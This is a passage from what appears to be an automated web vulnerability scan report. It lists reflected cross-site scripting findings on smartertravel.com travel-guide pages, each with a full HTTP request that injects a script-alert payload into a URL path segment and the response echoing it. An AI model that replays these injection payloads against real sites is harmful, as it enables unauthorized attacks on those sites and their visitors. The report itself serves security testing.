vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 01:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:29:26 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:29:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 01:29:26 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-advice64f8f<script>alert(1)</script>6af7dc60215/</p>
...[SNIP]...

2.50. http://www.smartertravel.com/travel-guides/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4144<script>alert(1)</script>26cd2fea395 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesb4144<script>alert(1)</script>26cd2fea395/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:41:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:42:16 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:42:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:42:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesb4144<script>alert(1)</script>26cd2fea395/</p>
...[SNIP]...

2.51. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/amsterdam-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 500c0<script>alert(1)</script>f8988cdb722 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides500c0<script>alert(1)</script>f8988cdb722/amsterdam-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:35 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:35 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:59:35 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides500c0<script>alert(1)</script>f8988cdb722/amsterdam-travel-guide.html</p>
...[SNIP]...

2.52. http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/amsterdam-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8652c<script>alert(1)</script>b73c3c8ffe1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/amsterdam-travel-guide.html8652c<script>alert(1)</script>b73c3c8ffe1 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:59:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:59:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:59:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/amsterdam-travel-guide.html8652c<script>alert(1)</script>b73c3c8ffe1</p>
...[SNIP]...

2.53. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/boston-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 702ea<script>alert(1)</script>e314aff6558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides702ea<script>alert(1)</script>e314aff6558/boston-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:04:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:39 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:39 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:39 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides702ea<script>alert(1)</script>e314aff6558/boston-travel-guide.html</p>
...[SNIP]...

2.54. http://www.smartertravel.com/travel-guides/boston-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/boston-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe36e<script>alert(1)</script>e04ca187a7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/boston-travel-guide.htmlfe36e<script>alert(1)</script>e04ca187a7a HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:04:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/boston-travel-guide.htmlfe36e<script>alert(1)</script>e04ca187a7a</p>
...[SNIP]...

2.55. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chattanooga-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bd0d<script>alert(1)</script>3107a4599f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides4bd0d<script>alert(1)</script>3107a4599f1/chattanooga-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:29 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:29 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides4bd0d<script>alert(1)</script>3107a4599f1/chattanooga-travel-guide.html</p>
...[SNIP]...

2.56. http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chattanooga-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c5f4<script>alert(1)</script>4b4e2417751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/chattanooga-travel-guide.html5c5f4<script>alert(1)</script>4b4e2417751 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:57 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:52:57 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:52:57 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/chattanooga-travel-guide.html5c5f4<script>alert(1)</script>4b4e2417751</p>
...[SNIP]...

2.57. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chicago-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99cf7<script>alert(1)</script>777488295a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides99cf7<script>alert(1)</script>777488295a6/chicago-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:53:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:45 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:53:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:53:45 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides99cf7<script>alert(1)</script>777488295a6/chicago-travel-guide.html</p>
...[SNIP]...

2.58. http://www.smartertravel.com/travel-guides/chicago-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/chicago-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee59f<script>alert(1)</script>125d2de89c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/chicago-travel-guide.htmlee59f<script>alert(1)</script>125d2de89c1 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
